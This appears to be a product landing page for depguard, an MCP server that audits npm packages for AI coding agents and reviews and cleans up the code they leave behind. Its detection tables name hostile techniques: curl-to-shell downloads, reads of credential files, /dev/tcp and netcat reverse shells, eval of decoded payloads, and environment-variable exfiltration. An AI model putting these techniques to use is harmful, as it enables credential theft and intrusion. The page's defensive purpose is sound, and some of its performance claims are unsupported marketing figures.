Guard
Before every npm install — whether the user asked or the AI decided on its own — depguard verifies the package exists, checks for typosquatting, and runs a security audit.
depguard_guard("express")
v1.8.2 · Advisory Database · 11 Tools · Zero Dependencies ·
Your AI agent's
security guardrail
An MCP server that guards your codebase from three threats: compromised npm packages, insecure dependencies, and debris left by AI coding agents. Backed by a curated advisory database of known attacks. Every package is verified before install, every coding session is reviewed, every unused dependency is flagged.
// Add depguard to any MCP-compatible AI agent $ claude mcp add depguard -- npx -y depguard-cli --mcp // 1. AI agent wants to install a package Agent "I need RTSP streaming support" depguard guard — go2rtc (score 72/100, allow) // 2. AI agent finishes coding depguard review — Found 3 console.logs, 1 empty catch, 1 TODO Agent Fixing 5 issues before committing... // 3. Cleanup unused packages depguard sweep — lodash unused (~1.4 MB savings)
The Problem
Your AI agent installs blindly and leaves debris
AI coding agents create two problems: they install packages without checking security, and they leave garbage in your code (console.logs, empty catch blocks, broken imports, orphan files). Without depguard, every npm install is a blind trust decision and every coding session adds invisible debt.
2,200+
Malicious packages detected on npm in 2025
8M+
Weekly downloads compromised by event-stream attack
100x
Faster package installs with AI agents vs manual review
18+
Malware patterns depguard detects in package source code
99%
AI tokens saved per audit vs manual web search and reasoning
How It Works
How MCP integration works
One command connects depguard to your AI agent. From that moment, every install is verified and every coding session is reviewed.
Review
After coding, depguard scans the source files for debris the AI left behind: console.logs, empty catch blocks, broken imports, orphan files. The AI agent fixes them before reporting done.
depguard_review(".", "quick")
Clean Up
At the end of a session, depguard finds unused packages that were installed but never imported. The AI agent removes them, keeping the project lean.
depguard_sweep(".")
Try It
See depguard in action
This is a limited demo with pre-loaded data for 6 popular packages. For live audits on any package, install depguard-cli locally.
AVAILABLE PACKAGES: express, lodash, react, axios, chalk, moment
// Select a package above or type one to see the audit report $ depguard-cli audit ___
Get Started
One command. Infinite peace of mind.
No API keys. No accounts. No configuration. Your AI agent gets security superpowers in 10 seconds.
$ claude mcp add depguard -- npx -y depguard-cli --mcp
Getting Started
Add depguard to your AI agent
One command. Zero configuration. Your AI agent starts checking every dependency immediately.
Claude CodeMCP Ready
Claude DesktopMCP Ready
CursorMCP Ready
WindsurfMCP Ready
Continue.devMCP Ready
ClineMCP Ready
Roo CodeMCP Ready
Any MCP ClientJSON-RPC 2.0
// Claude Code — one command $ claude mcp add depguard -- npx -y depguard-cli --mcp // Claude Desktop, Cursor, Windsurf, Continue.dev, Cline, Roo Code // Add to your MCP config file: { "mcpServers": { "depguard": { "command": "npx", "args": ["-y", "depguard-cli", "--mcp"] } } } // That's it. Your agent now has 10 security tools. // No API keys. No accounts. No configuration.
MCP Tools
11 tools your AI agent calls automatically
Organized by workflow: before installing, after coding, project health, and quick lookups. The AI agent knows when to call each one.
depguard_guard
Called before every npm install, whether the user asked or the AI decided. Verifies the package exists, detects typosquatting, runs security audit, returns allow/warn/block.
Before Installdepguard_should_use
When the AI needs functionality ("RTSP streaming", "date formatting"), it calls this before choosing a package. Checks native Node.js alternatives first, then scores npm candidates.
Before Installdepguard_review
Called after code changes or before commit. Finds console.logs, empty catch blocks, broken imports, orphan files, abandoned TODOs. The AI fixes them before reporting done.
After Codingdepguard_sweep
Finds packages installed but never imported. Config-aware, workspace-aware, peer-dep-aware. Also detects phantom dependencies in node_modules.
After Codingdepguard_audit
Deep security audit of a single package. Downloads tarball, scans source code for 18+ malware patterns, checks dual advisory databases, analyzes install scripts.
Project Healthdepguard_audit_project
Audit all dependencies from a package.json in one call. Auto-detects project license. Use after cloning a repo or reviewing project security.
Project Healthdepguard_audit_deep
Crawls the full transitive dependency tree. Aggregates vulnerabilities across all nested packages. Shows circular dependencies and total attack surface.
Project Healthdepguard_score
Quick 0-100 quality score. Faster than full audit when you only need the number. Critical vulns cap at 30, high at 50.
Quick Lookupdepguard_verify
Quick existence check + typosquatting detection. Faster than guard when you only need to verify a package name exists.
Quick Lookupdepguard_search
Search npm by keywords, sorted by depguard quality score. Find packages without web searches.
Quick Lookupdepguard_audit_bulk
Audit multiple packages in one call. Use audit_project instead if you have a package.json path.
Quick LookupScoring Model
Transparent, reproducible scores
Every package scored 0–100 across five weighted dimensions. CVSS scores used when available. Hard security ceiling: critical vulns cap total at 30, high vulns at 50. Code analysis findings further reduce the score.
≥ 60
Install
Safe to use. Meets quality standards.
40 – 59
Caution
Review before using. Potential risks.
< 40
Write Your Own
Better to implement the functionality yourself.
Smart Advisor
Skip the package. Use Node.js.
depguard checks 20+ native alternatives before recommending npm packages. Less bloat, smaller attack surface.
npm install axios
globalThis.fetch()
Built-in HTTP client. Full Request/Response API.
Node 18+
npm install uuid
crypto.randomUUID()
RFC 4122 v4 UUID generation. Cryptographically secure.
Node 19+
npm install lodash.clonedeep
structuredClone()
Deep clone any serializable value. Handles circular refs.
Node 17+
npm install dotenv
process.loadEnvFile()
Load .env files natively. No parsing library needed.
Node 21.7+
npm install glob
fs.glob()
Native file globbing. Async iterator interface.
Node 22+
npm install jest
node:test
Built-in test runner with describe, it, and assertions.
Node 18+
npm install yargs
util.parseArgs()
Parse CLI arguments with type validation. Built-in.
Node 18.3+
npm install better-sqlite3
node:sqlite
Embedded SQLite database. Synchronous API.
Node 22.5+
What You Get
depguard vs doing it manually
Without depguard, you need to check multiple sources, analyze scripts by hand, and make gut-feel decisions. Here's what one command replaces.
| Task | depguard | Manual Approach |
|---|---|---|
| Check known CVEs | ✓ Automated | Search npm + GitHub advisories manually |
| GitHub Advisory Database | ✓ Included | Visit github.com/advisories, search, cross-reference |
| Static code analysis | ✓ 18+ patterns | Download tarball, read source code manually |
| Inspect install scripts | ✓ 20+ patterns | Read package source code line by line |
| Behavioral mismatch | ✓ Automated | Compare description vs code behavior yourself |
| Check maintenance health | ✓ Scored | Check npm page, GitHub commits, last publish date |
| Verify license compatibility | ✓ 25+ SPDX | Read LICENSE file, understand copyleft hierarchy |
| Evaluate package quality | ✓ 0–100 | Subjective judgement, no consistent scoring |
| Find native alternatives | ✓ 20+ mapped | Know Node.js APIs by heart or search docs |
| AI agent integration | ✓ 10 MCP tools | Not possible — agents install blindly |
| Time per package | ~2 seconds | 15–30 minutes of research |
New in v1.6.0
Static Code Analysis
depguard now downloads the package tarball and scans the actual source code for malware patterns, obfuscation, data exfiltration, and behavioral mismatches. Every finding includes a detailed explanation suitable for developers.
Malware Detection
Eval of decoded payloads, reverse shells via net.connect, cryptocurrency mining pool URLs (stratum+tcp). Critical severity — auto-blocks.
CriticalData Exfiltration
JSON.stringify(process.env), Object.keys(process.env), fetch with dynamic URLs from env vars, bracket-notation env access to evade scanners.
CriticalCode Execution
eval(), new Function(), child_process.exec/spawn, shell interpreter spawning. Flags dangerous patterns with context.
HighObfuscation
Long hex/unicode-encoded strings, base64 payloads, minified source in non-.min.js files. Techniques used to hide malicious code from reviewers.
HighBehavioral Mismatch
A "string formatter" that makes network calls? A "date utility" that reads the filesystem? depguard compares what a package says it does vs what it actually does.
UniqueRich Explanations
Every finding includes: severity, category, title, a detailed explanation of why it's dangerous, the exact evidence from source code, and a recommendation.
Developer-Friendly// What your AI agent receives for a suspicious package: { "severity": "critical", "category": "data-exfiltration", "title": "Serialization of entire environment", "explanation": "This package serializes your ENTIRE environment into a JSON string. Your API keys, database passwords, JWT secrets would be exposed.", "evidence": "const d = JSON.stringify(process.env);", "file": "src/index.js", "recommendation": "Do NOT install this package." }
Install Scripts
Install script analysis
depguard statically analyzes install scripts (preinstall, install, postinstall) for 20+ suspicious patterns. Each finding now includes a rich explanation and recommendation.
| Pattern | Severity | What It Detects |
|---|---|---|
| Remote code execution | Critical | curl/wget piped to sh, download-and-execute chains |
| Credential file access | Critical | Reading ~/.ssh, ~/.aws, ~/.npmrc, ~/.gnupg, /etc/passwd |
| Sensitive env vars | Critical | Accessing $NPM_TOKEN, $AWS_SECRET, $GITHUB_TOKEN |
| Eval of decoded content | Critical | eval(atob(...)), eval(Buffer.from(..., "base64")) |
| Reverse shells | Critical | /dev/tcp connections, netcat with -e flag |
| Shell typosquatting | Critical | /bin/ssh instead of /bin/sh |
| Process spawning | High | child_process, execSync, spawn |
| Dynamic code execution | High | eval(), exec() in install scripts |
| Obfuscated strings | High | Hex-encoded strings, base64 payloads |
| Network APIs | High | net.connect, dgram, dns.resolve in install scripts |
Real Threats
These attacks happened
Major npm supply chain incidents and how depguard detects the patterns that made them possible.
| Package | Year | Severity | What Happened | depguard Detection |
|---|---|---|---|---|
| event-stream | 2018 | Critical | Malicious dependency stole cryptocurrency wallet keys. 8M weekly downloads compromised. | Code analysis flags obfuscated code + credential access patterns. Script analysis catches eval of decoded content. |
| ua-parser-js | 2021 | Critical | Hijacked account published cryptominers and password stealers via postinstall. | Code analysis detects stratum+tcp mining URLs. Install script analysis catches process spawning and credential file access. |
| node-ipc | 2022 | Critical | Maintainer added code to wipe files based on geolocation. Dependency of vue-cli. | Behavioral mismatch: IPC library making network calls + filesystem writes. Advisory database flags GHSA. |
| colors + faker | 2022 | High | Maintainer sabotaged packages with infinite loops. Broke thousands of projects. | Maintenance score drops. Advisory database flags incident. Score falls below threshold. |
| eslint-scope | 2018 | Critical | Compromised token published version stealing npm tokens from ~/.npmrc. | Code analysis detects credential file reads. Script analysis flags env var exfiltration. |
| coa + rc | 2021 | Critical | Hijacked accounts. Obfuscated malware in preinstall scripts. | Code analysis detects base64 + eval pattern. Script analysis flags obfuscated code + process spawning. |
| crossenv (typosquat) | Ongoing | High | Names mimicking popular packages. Steal environment variables on install. | Typosquatting detection via Levenshtein distance. Code analysis flags JSON.stringify(process.env). |
v1.6.0 — Static Code Analysis
Beyond CVEs: analyzing the actual code
depguard now downloads package tarballs and scans source code for malware patterns, obfuscation, and behavioral mismatches. Every finding includes a rich, human-readable explanation.
Tarball Analysis
Downloads the npm package tarball, extracts JS files, and scans with 18+ pattern rules across 6 threat categories: malware, data-exfiltration, code-execution, obfuscation, unexpected-behavior, supply-chain.
[CRITICAL] Serialization of entire environment
JSON.stringify(process.env) detected in src/index.js
JSON.stringify(process.env) detected in src/index.js
Behavioral Mismatch
Compares the package description and keywords against detected code behavior. A "string formatter" making network calls? Flagged as unexpected-behavior with explanation.
[HIGH] Network activity inconsistent
Package "date formatter" makes HTTP requests
Package "date formatter" makes HTTP requests
SecurityFinding Format
Every finding returns: severity, category, title, detailed explanation, evidence (exact code), file path, and recommendation. AI agents can present these directly to developers.
212 tests · 0 failures
28 new tests for code analysis
28 new tests for code analysis
v1.6.0 Detection Categories
malware
Eval+decode, reverse shells, crypto mining, TCP backdoors
Eval+decode, reverse shells, crypto mining, TCP backdoors
data-exfiltration
Env serialization, credential reads, dynamic fetch URLs
Env serialization, credential reads, dynamic fetch URLs
code-execution
eval(), new Function(), child_process, shell spawn
eval(), new Function(), child_process, shell spawn
obfuscation
Hex/unicode strings, base64 payloads, minified source
Hex/unicode strings, base64 payloads, minified source
unexpected-behavior
Network/FS access mismatched with package purpose
Network/FS access mismatched with package purpose
supply-chain
Typosquatting patterns in install scripts
Typosquatting patterns in install scripts
The Complete Workflow
Guard. Audit. Review. Clean up.
depguard is the only MCP tool that covers the full AI coding lifecycle: verify packages before install, audit for vulnerabilities, review the code the AI generated, and clean up unused dependencies.
1. Guard
depguard_guard — Before every npm install, whether the user asked or the AI decided. Blocks hallucinated packages, detects typosquatting, runs security audit.
[BLOCK] ai-made-up-pkg
Package does NOT exist on npm!
Package does NOT exist on npm!
2. Audit
depguard_audit — Deep security analysis. Downloads the tarball, scans source code for malware, checks dual advisory databases, analyzes install scripts.
[WARN] expresss
Possible typosquat of: express
Possible typosquat of: express
3. Review
depguard_review — After coding, scans source files for debris the AI left behind. Console.logs, empty catch blocks, broken imports, orphan files, abandoned TODOs. The AI fixes them before reporting done.
Found: 3 console.logs, 1 empty catch
Fixing before commit...
Fixing before commit...
4. Clean Up
depguard_sweep — Finds packages that were installed but never imported. Config-aware (eslint, typescript, jest...), workspace-aware, with estimated size savings.
Unused: lodash (~1.4 MB)
Savings: ~2.4 MB from 3 packages
Savings: ~2.4 MB from 3 packages
v1.8 Architecture Redesign
Advisory Database
Curated database of known compromised packages. event-stream, colors, faker auto-blocked with full incident history.
Curated database of known compromised packages. event-stream, colors, faker auto-blocked with full incident history.
Comment Stripping
Code analysis strips comments before scanning. URLs in JSDoc and license headers no longer flagged.
Code analysis strips comments before scanning. URLs in JSDoc and license headers no longer flagged.
Informational Findings
Code analysis findings are informational. Only CVEs and advisory DB affect the security score.
Code analysis findings are informational. Only CVEs and advisory DB affect the security score.
Lock File Parsing
Reads package-lock.json and pnpm-lock.yaml. Transitive deps no longer flagged as phantom.
Reads package-lock.json and pnpm-lock.yaml. Transitive deps no longer flagged as phantom.
CVSS + Security Ceiling
Critical vulns cap at 30. High at 50. Compromised packages score 0. Non-negotiable.
Critical vulns cap at 30. High at 50. Compromised packages score 0. Non-negotiable.
Intl Alternatives
DateTimeFormat, NumberFormat, RelativeTimeFormat, Collator detected as native alternatives.
DateTimeFormat, NumberFormat, RelativeTimeFormat, Collator detected as native alternatives.
Real Impact: v1.8 Score Accuracy
Compromised packages now blocked
event-stream allow (75) → block (0)
colors allow (88) → score 0
faker allow → score 0
colors allow (88) → score 0
faker allow → score 0
False positives eliminated
eslint 50 → 94
vue 50 → 94
fastify 30 → 93
zod 30 → 96
morgan 50 → 92
vue 50 → 94
fastify 30 → 93
zod 30 → 96
morgan 50 → 92
Contact
Get in touch
Questions, partnerships, security reports, or feedback — reach out through any of these channels.